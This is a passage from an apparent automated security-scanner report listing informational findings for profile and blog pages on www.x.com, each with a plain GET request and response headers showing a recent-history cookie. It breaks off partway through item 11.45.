<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.18. https://www.x.com/people/PP_MTS_Magarvin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.19. https://www.x.com/people/PP_MTS_Patrick

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.20. https://www.x.com/people/PayPalXadmin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.21. https://www.x.com/people/PayPal_Carolyn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.22. https://www.x.com/people/PayPal_Sudha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.23. https://www.x.com/people/PayPal_ToddS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.24. https://www.x.com/people/Praveen

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.25. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.26. https://www.x.com/people/RightWayMail

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.27. https://www.x.com/people/S.Aijaz

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132393239303b332c3134303635343b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c34383739343b332c31303737303b332c31393037313b332c33353136303b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.28. https://www.x.com/people/SRS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.29. https://www.x.com/people/Saleem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.30. https://www.x.com/people/Shade8934

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.31. https://www.x.com/people/Suneetha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.32. https://www.x.com/people/admin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.33. https://www.x.com/people/amypiazza00

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.34. https://www.x.com/people/angelleye

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323430323b332c3133373331333b332c3133313833303b332c3133363236393b332c31323739393b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.35. https://www.x.com/people/billday

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.36. https://www.x.com/people/blingnation2010

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.37. https://www.x.com/people/bryngregory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.38. https://www.x.com/people/das_licht

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.39. https://www.x.com/people/dchankhour

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.40. https://www.x.com/people/eferreira

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.41. https://www.x.com/people/encore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.42. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.43. https://www.x.com/people/gazugafan

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133363236393b332c3133373331333b332c3132393239303b332c3133393730313b332c3133313833303b332c3133373135383b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.44. https://www.x.com/people/gem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.45. https://www.x.com/people/gogoeric

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
